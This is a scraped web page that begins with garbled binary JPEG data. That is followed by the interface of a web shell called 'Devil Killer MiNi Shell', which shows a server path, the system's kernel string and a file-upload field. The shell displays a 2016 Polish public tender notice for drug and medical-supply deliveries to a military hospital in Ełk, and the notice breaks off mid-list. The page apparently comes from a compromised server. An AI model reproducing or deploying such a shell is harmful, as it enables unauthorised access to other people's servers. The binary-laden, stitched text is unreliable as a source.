JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160706/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160706/121253-N-2016.html

<p class="kh_header"><b>Ełk: Numer sprawy: 15/2016-DZP/PNO. Nazwa zadania: Dostawa leków, produktów leczniczych oraz materiałów jednorazowego użytku.</b><br>
<b>Numer ogłoszenia: 121253 - 2016; data zamieszczenia: 06.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Numer sprawy: 15/2016-DZP/PNO. Nazwa zadania: Dostawa leków, produktów leczniczych oraz materiałów jednorazowego użytku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w niniejszej specyfikacji części zamówienia - zadania od 1 do 19. 
Każdy z wykonawców może złożyć ofertę na wybrane przez siebie zadanie lub zadania.
Opis przedmiotu zamówienia

Przedmiotem zamówienia jest dostawa leków, produktów leczniczych oraz materiałów jednorazowego użytku do Apteki Szpitalnej w podziale na 19 Zadań. Wykonawca we własnym zakresie dostarczy określony niniejszą Specyfikacją Istotnych Warunków Zamówienia asortyment. 
Szczegółowy opis przedmiotu zamówienia zawierają formularze cenowe - Załącznik Nr 2 do SIWZ.
Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek: znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza do składania ofert równoważnych o parametrach techniczno - eksploatacyjno - użytkowych nie gorszych niż te, podane pod pojęciem typu (podstawa prawna: art. 29 ust. 3 ustawy - Prawo zamówień publicznych). W przypadku złożenia oferty, w której zostanie zaoferowany asortyment o parametrach równoważnych - Wykonawca zobowiązany jest złożyć oświadczenie, że oferta jest równoważna z opisem przedmiotu zamówienia. Wykonawca musi wskazać nazwę asortymentu równoważnego oraz wskazać (podać) dokumenty potwierdzające równoważność rozwiązań tj. atesty polskie i europejskie, certyfikaty itp. zamawiający korzystając ewentualnie z opinii rzeczoznawców dokona oceny zaproponowanych rozwiązań oraz zadecyduje o ich równoważności. Przedstawienie w ofercie towaru uznanego przez Zamawiającego za nie równoważny spowoduje odrzucenie oferty jako niezgodnej z SIWZ. 
W przypadku wątpliwości obowiązek udowodnienia równoważności złożonej oferty spoczywa na Wykonawcy.
Miejsce dostawy leków: sukcesywne dostawy leków do Apteki 108 Szpitala Wojskowego z Przychodnią SP ZOZ w Ełku, przy ulicy Kościuszki 30. Wielkość i asortyment dostaw będą uzależnione od bieżących potrzeb Zamawiającego.
Podane ilości leków mają charakter szacunkowy i mogą ulec zmianie.
Wykonawca zobowiązuje się do zrealizowania zapotrzebowania NA RATUNEK lub NA CITO w ciągu 24 godziny od złożenia zamówienia.
		Minimalny okres ważności dostarczanych leków musi wynosić minimum 6 miesięcy od daty dostawy.
	W uzasadnionych przypadkach Zamawiający dopuszcza opakowania o innej, niż podane wielkości - zapotrzebowanie na dany asortyment powinno być wówczas odpowiednio przeliczone, a ilość szt. w opakowaniach zgodna z zamówieniem (w przypadku wartości ułamkowych opakowania należy zaokrąglić je do pełnego w górę).
	Przedmioty dostawy zamieszczone w ofercie powinny posiadać dokładny i czytelny opis przedmiotu zamówienia na opakowaniu oraz stosowne certyfikaty lub atesty dopuszczające ich stosowanie w służbie zdrowia zgodnie z polskim prawem oraz prawem Unii Europejskiej (powinny odpowiadać określonym normom lub specyfikacjom technicznym, posiadać aktualne świadectwo dopuszczenia do obrotu oferowanych środków wymagane prawem).
	Przedmioty dostawy zamieszczone w ofercie powinny być bezpieczne w użyciu dla pacjentów oraz dla personelu.
	Oznakowanie dostarczonych wyrobów, instrukcje użytkowania, opis wyrobu, etykiety (oryginalne) muszą być sporządzone w języku polskim.
Wymagania dotyczące przedmiotu zamówienia:
Produkty lecznicze stanowiące przedmiot zamówienia muszą być dopuszczone do stosowania na terenie Polski zgodnie z postanowieniami ustawy Prawo farmaceutyczne z dnia 6 września 2001 roku (Dz. U. Nr 53 poz. 533 z późn. zm.) - wykonawca winien posiadać wszelkie wymagane prawem dokumenty  dopuszczające do obrotu na terenie RP dla oferowanego produktu leczniczego oraz okazać je na żądanie Zamawiającego
Uwaga: dotyczy tylko produktów będących lekami i dostępnych na rynku na dzień złożenia oferty
Oferowane cytostatyczne produkty lecznicze muszą posiadać karty charakterystyki leku informujące o gęstości lub masie leku, które Wykonawca dostarczy Zamawiającemu na każde jego żądanie po podpisaniu umowy. 
W przypadku leków onkologicznych preparaty o różnych dawkach umieszczone w tym samym zadaniu należy zaoferować od jednego producenta, aby w praktyce istniała możliwość łączenia
W przypadku pozycji lekowych aktualnie nie dostępnych na rynku (np. wstrzymanie produkcji) należy je wycenić po ostatniej cenie sprzedaży udokumentowanej przez producenta i zaznaczyć te produkty jako niedostępne na dzień składania oferty (np. wymienić na załączniku nr 2 pod pakietem lub w inny czytelny sposób). Zamawiający będzie zamawiał te pozycje tylko z chwilą ponownego wprowadzenia produktu do sprzedaży, po zaoferowanej cenie. Nie dopuszcza się możliwości pominięcia i nie skalkulowania jakiejkolwiek pozycji
Zamawiający wymaga aby leki onkologiczne i z programów miały wymagane kody EAN zgodnie z aktualnym Obwieszczenie Ministra Zdrowia w sprawie wykazu refundowanych leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych.
Brak spełnienia powyższego warunku skutkować będzie odrzuceniem oferty.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0, 33.60.00.00-0, 33.68.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.05.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga posiadania aktualnych zezwoleń na obrót produktami leczniczymi (TYLKO W ZAKRESIE WYMAGANYM DO ZADAŃ). Należy przedstawić jeden z dokumentów: 
A.	Kopia aktualnego zezwolenia Głównego Inspektora Farmaceutycznego (GIF) w zakresie prowadzenia hurtowni farmaceutycznej, lub inny dokument uprawniający Wykonawcę do sprzedaży i obrotu oferowanymi produktami leczniczymi 
B.	Kopia aktualnego zezwolenia Głównego Inspektora Farmaceutycznego na wytwarzanie, jeżeli wykonawca jest wytwórcą lub inny dokument uprawniający Wykonawcę do sprzedaży i obrotu oferowanymi produktami leczniczymi 
C.	W przypadku Wykonawcy prowadzącego hurtownię farmaceutyczną lub skład konsygnacyjny albo celny - kopię zezwolenia na jego prowadzenie zawierające uprawnienia przyznane przez Głównego Inspektora Farmaceutycznego w zakresie obrotu produktami leczniczymi lub inny dokument uprawniający Wykonawcę do sprzedaży i obrotu oferowanymi produktami leczniczymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Razem z oferta wykonawca zobowiązany będzie złożyć następujące dokumenty nie wymienione powyżej: 1) 	Formularz ofertowy - wypełniony i podpisany przez wykonawcę - Załącznik Nr 1 do SIWZ

2) 	Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 19 - wypełnione i podpisane przez wykonawcę - Załącznik Nr 2 do SIWZ

3.) 	Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - Załącznik Nr 3 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
a.zmiany cen w zakresie ich obniżenia w trakcie trwania umowy 
b.wstrzymanie lub wycofanie z obrotu dostępnych na rynku serii produktów leczniczych stanowiących przedmiot zamówienia decyzją GIF,
c.zaprzestanie lub wstrzymanie produkcji produktów leczniczych stanowiących przedmiot zamówienia,
d.pojawienie się na rynku ulepszonej formy leku / wyrobu medycznego będącego przedmiotem zamówienia, 
e.zmiana wielości opakowania nie powodująca zmiany ogólnej ilości (sztuk) leku objętego przedmiotową umową oraz nie powodująca zmiany ceny za 1 tabletkę, ampułkę, szt. wyrobu medycznego itp. 
f.zmiany numeru katalogowego produktu,
g.zmiany produktu i jego nazwy przy zachowaniu parametrów zaproponowanych w ofercie tylko w przypadku wycofania produktu z obrotu przez producenta i zastąpienia go  produktem nie gorszym o innej nazwie,
h.zmian wysokości wynagrodzenia pod warunkiem iż poniższe zmiany będą miały wpływ na koszt wykonania zamówienia
-w przypadku zmiany stawki podatku VAT zmianie ulegnie kwota podatku VAT i cena brutto, cena netto pozostanie bez zmian. Zmiana następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę. Powyższa zmiana nie wymaga sporządzenia aneksu do umowy, 
-wysokości minimalnego wynagrodzenia za pracę,
-zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
2.W sytuacji, kiedy w okresie trwania umowy nie zostanie zamówiony cały asortyment nią określony, a zaistnieje okoliczność uzasadniona potrzebami Zamawiającego, strony dopuszczają możliwość aneksowania niniejszej umowy na okres pozwalający wykorzystać asortyment w ilości niezbędnej dla funkcjonowania Zamawiającego związanego z jego działalnością, jednak na okres nie dłuższy niż do czasu rozstrzygnięcia nowej procedury przetargowej dotyczącej tożsamego asortymentu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.108spzoz.elk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 4 Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2016 godzina 09:30, miejsce: 108 Szpital Wojskowy z Przychodnią SP ZOZ
Ul. Kościuszki 30
19-300 Ełk
Pokój nr 22 Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.08.2016.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> pojemnik do transportu materiału biologicznego 10,6ml		SZT	50
pojemnik do transportu materiału biologicznego 366ml		SZT	50
pojemnik do transportu materiału biologicznego 520 ml		SZT	50
pojemnik do transportu materiału biologicznego 850ml		SZT	50
pojemnik do transportu materiału biologicznego 1200ml		SZT	50
pojemnik do transportu materiału biologicznego 2300ml		SZT	50
pojemnik do transportu materiału biologicznego 3400ml		SZT	50
pojemnik do transportu materiału biologicznego 5600ml		OP	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda uzdatniona 5l		OP	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rec. Pasta cynkowa 500g	500 g		OP	10
Rec. Prodermina 50g	50 g		OP	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie Nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Heparine 500 IU roztwor do wstrzykniec10amp a 5 ml	pr.do wstrz.doż.	500IU	10amp a 5 ml		OP	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Temozolamid 0,1g op. a 5kaps			op	20
W przypadku leków onkologicznych preparaty o różnych dawkach umieszczone w tym samym zadaniu należy zaoferować od jednego producenta, aby w praktyce istniała możliwość łączenia.											
Oferowane produkty lecznicze muszą posiadać karty charakterystyki leku informujące o gęstości lub masie leku, które Wykonawca dostarczy Zamawiającemu na każde jego żądanie po podpisaniu umowy dostawy.											
Zamawiający wymaga aby leki onkologiczne i z programów miały wymagane kody EAN zgodnie z aktualnym Obwieszczenie Ministra Zdrowia w sprawie wykazu refundowanych leków, środków spożywczych specjalnego przeznaczenia żywieniowego oraz wyrobów medycznych. Brak spełnienia powyższego warunku skutkować będzie odrzuceniem oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Torba na basen
Zawierajaca wkladkę absorbcyjną pochłaniającą nie mniej niż 500 ml krwi, moczu do 3000 ml wody
Posiadająca trwałe zamkniecie zamknięcie
Wyrób medyczny. Rozmiar 38-42x58-62cm	SZT	360
Torba na wymiociny
Zawierajaca wkladkę absorbcyjną pochłaniającą nie mniej niż 500 ml krwi, moczu do 3000 ml wody
Posiadająca trwałe zamkniecie zamknięcie
Wyrób medyczny
Rozmiar 23-27cm x 23x 27 cm	SZT	420
Torba na wc
Zawierajaca wkladkę absorbcyjną pochłaniającą nie mniej niż 500 ml krwi, moczu do 3000 ml wody
Posiadająca trwałe zamkniecie zamknięcie
Wyrób medyczny
Rozmiar 38-42 cm x63-68cm	SZT	360
Torba kaczka męska.                                                                                       Zawierajaca wkladkę absorbcyjną pochłaniającą nie mniej niż 500 ml krwi, moczu do 3000 ml wody
Posiadająca trwałe zamkniecie zamknięcie
Wyrób medyczny
Rozmiar33-37 cm x14-16cm	SZT	420
Czepek anybakteryjny:
Nasączony szamponem i odżywką;
Nie wymagający moczenia i spłukiwania
Myjacy jodynę, krew, żele: ekg,usg,eeg
Nie wymagający podgrzania dłużej niż 20 sek w kuchence mikrofalowej o mocy 650 W 
Wyrób medyczny (zgłoszony do rejestru wyrobów medycznych)	SZT	60
Rękawica myjąca aqua total
Wykonane z włókniny nasączonej balsamem do mycia testowanym dermatologicznie o neutralnym PH; bez zawartości alkoholu, mydła, 
Nie wymagające moczenia i spłukiwania
Zawierające film separacyjny oddzielajacy dłoń osoby myjącej od ciala pacjenta
Nie wymagające podgrzania dłużej niż 40 sek w kuchence mikrofalowej o mocy 700 W. Rozmiar 14-16cm x 22-24cm
Wyrób medyczny (zgłoszony do rejestru wyrobów medycznych)                         Opakowanie min. 10 szt.	OP	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.05.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
